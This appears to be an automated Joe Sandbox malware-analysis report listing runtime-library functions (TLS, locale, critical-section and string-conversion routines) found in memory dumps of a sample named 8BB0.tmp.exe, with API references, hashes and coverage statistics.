Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 02132959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02130DA0), ref: 0213295F
GetLastError.KERNEL32 ref: 0213296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132982
__CxxThrowException@8.LIBVCRUNTIME ref: 02132990

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 9d56180658b44772ae942b125140476625a91cd879878512d4fe12a02601eb50
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: ABE012345401156B8715BBB89C49A7B72AA6B01765B600B25F865E20E0EB78D5088AA9

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0215B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0215B32B,?,00000050,?,?,?,?,?), ref: 0215B1AB

Strings

OCP, xrefs: 0215B124
ACP, xrefs: 0215B0EE

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 92c4536b7ca73807b5d018b88fdfb5356d30969857af3b6b6da04e320f7fcb52
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 2D21B862A88125E6DBA48E64AD817977397EF40B5CF5780A4ED29D7208F732DB00C390

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 02154B26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 02154B72
GetFileType.KERNEL32(00000000), ref: 02154B84

Strings

@YV, xrefs: 02154BBB

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: @YV
API String ID: 3000768030-1722435086
Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction ID: 5bb0deef0952f01b7cc3e1103a626cec541b62b990f5ba82128dae2a97017c4a
Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction Fuzzy Hash: ED11B779584F72CAD7344E3E9C88722BAA4EB46135B2907AAE8B6C75F2C331D5C5C244

Function 004348BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0043490B
GetFileType.KERNEL32(00000000), ref: 0043491D

Strings

@YV, xrefs: 00434954

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: FileHandleType
String ID: @YV
API String ID: 3000768030-1722435086
Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction ID: 9875bc295672454492d04964ad4796884c43b126410369cfab48893691dd09dc
Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction Fuzzy Hash: 4B11D5B550474146DB304E3E8C88763BA94AFDA334F38276BD0B6936F1C22CE9829649

Function 0214CBFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214CC2A
_free.LIBCMT ref: 0214CC50

Strings

@YV, xrefs: 0214CC25, 0214CC32, 0214CC4B, 0214CC58, 0214CC7E

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free
String ID: @YV
API String ID: 269201875-1722435086
Opcode ID: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
Instruction ID: c8d2cc5dd6052684e0ab8b3849dd3eb778ef3ae410bc9523042c0d7cea3665d4
Opcode Fuzzy Hash: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
Instruction Fuzzy Hash: 8C11B671B813149FE7209B2DAC84B5537A59B80771F240677E929CB2E1EB70D6864FC4

Function 0042C995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042C9C3
_free.LIBCMT ref: 0042C9E9

Strings

@YV, xrefs: 0042C9BE, 0042C9CB, 0042C9E4, 0042C9F1, 0042CA17

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID: @YV
API String ID: 269201875-1722435086
Opcode ID: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
Instruction ID: eb719cc1bfb6819218d089f87952d2fc75fd927a7e25ce3d54c3d3c6ae1b4b1e
Opcode Fuzzy Hash: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
Instruction Fuzzy Hash: 8E11D671B003105ED7209F2DBC81B5A3AA4AB94765F240637F920CA3D1D378D9864B8D

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 02155895 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0214E654: RtlEnterCriticalSection.NTDLL(01CD0DAF), ref: 0214E663

RtlDeleteCriticalSection.NTDLL(@YV), ref: 021558F7
_free.LIBCMT ref: 02155905

Strings

@YV, xrefs: 021558BF, 021558D5, 021558DA, 021558EB, 021558F6, 021558FD, 02155902, 0215590B

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: @YV
API String ID: 1836352639-1722435086
Opcode ID: fa694aaca2794790394fd374aec7ec9cad519f71ffb8d99412d0c2b855f6b9e5
Instruction ID: 00884495a03759087080af55a5cb5371d6998c80c0ce5be2f61410990af76f24
Opcode Fuzzy Hash: fa694aaca2794790394fd374aec7ec9cad519f71ffb8d99412d0c2b855f6b9e5
Instruction Fuzzy Hash: 9511C831580324EFDB10DF98D885F5C77B1AF04326F6041A6E865DB2A1CB38E506CF08

Function 0043562E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
_free.LIBCMT ref: 0043569E

Strings

@YV, xrefs: 00435658, 0043566E, 00435684, 00435696, 004356A4

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: @YV
API String ID: 1836352639-1722435086
Opcode ID: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
Instruction ID: 52a1ea267b11448604aac72e837bb79cf4a64da9af37325288c97695b126f8a5
Opcode Fuzzy Hash: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
Instruction Fuzzy Hash: 4E118E715003149FDB10DF99D882B5D77B0AB0832AFA1402BE855DB2A2CB78E8428F48

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

ios_base::failbit set, xrefs: 0040C510
F(@, xrefs: 0040C547

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 1a5c127bad98780cf7120583b0a686b34df283a21e54aace75fc879e8eb27ad0
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 1a5c127bad98780cf7120583b0a686b34df283a21e54aace75fc879e8eb27ad0
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: c9eecc0e4369ac7dfaf8d6c6ba4700fb61a9f94c7fbf36bd6db8aa08719d0ee7
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: c9eecc0e4369ac7dfaf8d6c6ba4700fb61a9f94c7fbf36bd6db8aa08719d0ee7
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: 95af8a848c7b95c0b0710a03f208acb594888a6f497f0fa4d07e2459abf0159a
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: 95af8a848c7b95c0b0710a03f208acb594888a6f497f0fa4d07e2459abf0159a
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0214CCD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 02155895: RtlDeleteCriticalSection.NTDLL(@YV), ref: 021558F7
Part of subcall function 02155895: _free.LIBCMT ref: 02155905

Part of subcall function 021538D0: _free.LIBCMT ref: 021538F2

RtlDeleteCriticalSection.NTDLL(@YV), ref: 0214CCFD
_free.LIBCMT ref: 0214CD11

Strings

@YV, xrefs: 0214CCE3, 0214CCF0, 0214CCFC, 0214CD16

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$CriticalDeleteSection
String ID: @YV
API String ID: 1906768660-1722435086
Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction ID: 78a1c9a78b32b91e819e805065d144d54c705654178ee64696508de2dc6b798a
Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction Fuzzy Hash: 87E0DF32C04324DFC7206B58FC88A4A3BF6AF89362B210476E818C3121CB20ED098F88

Function 0042CA6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 0043562E: DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
Part of subcall function 0043562E: _free.LIBCMT ref: 0043569E

Part of subcall function 00433669: _free.LIBCMT ref: 0043368B

DeleteCriticalSection.KERNEL32(00565920), ref: 0042CA96
_free.LIBCMT ref: 0042CAAA

Strings

@YV, xrefs: 0042CA7C, 0042CA89, 0042CAAF

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$CriticalDeleteSection
String ID: @YV
API String ID: 1906768660-1722435086
Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction ID: 096468770cdb8f5f473685e72dce597222f10a1d1bc444d33569d92b2b8518b1
Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction Fuzzy Hash: C1E012329107249FD621AF5EF885A5E7BB49B8D356B61443BF40592162CA24AD058B4C

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: 34b3586ccf631747a2a280b867d5c1524efdb2f0c560e495eb6f5fdc2ae79a01
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: 34b3586ccf631747a2a280b867d5c1524efdb2f0c560e495eb6f5fdc2ae79a01
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 004394BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 004394BD
GetCommandLineW.KERNEL32 ref: 004394C8

Strings

%T, xrefs: 004394C3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CommandLine
String ID: %T
API String ID: 3253501508-1623511446
Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08

Function 0214B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02122AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02122AAD,00000000), ref: 0214B187
GetLastError.KERNEL32 ref: 0214B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02122AAD,00000000), ref: 0214B1F0

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
Instruction ID: 5dd053a2bbf594accf8456329726cf29b7803091a22a3c12dd7dac360a2f8e50
Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
Instruction Fuzzy Hash: 26411530E88206AFCF259F64D844BAE7BB5EF41718F154169EC5DA71A0DF30EA01CB60

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: 8BB0.tmp.exePID: 5064, Parent PID: 4724COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	43.8%
Signature Coverage:	10.9%
Total number of Nodes:	64
Total number of Limit Nodes:	4

Executed Functions

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

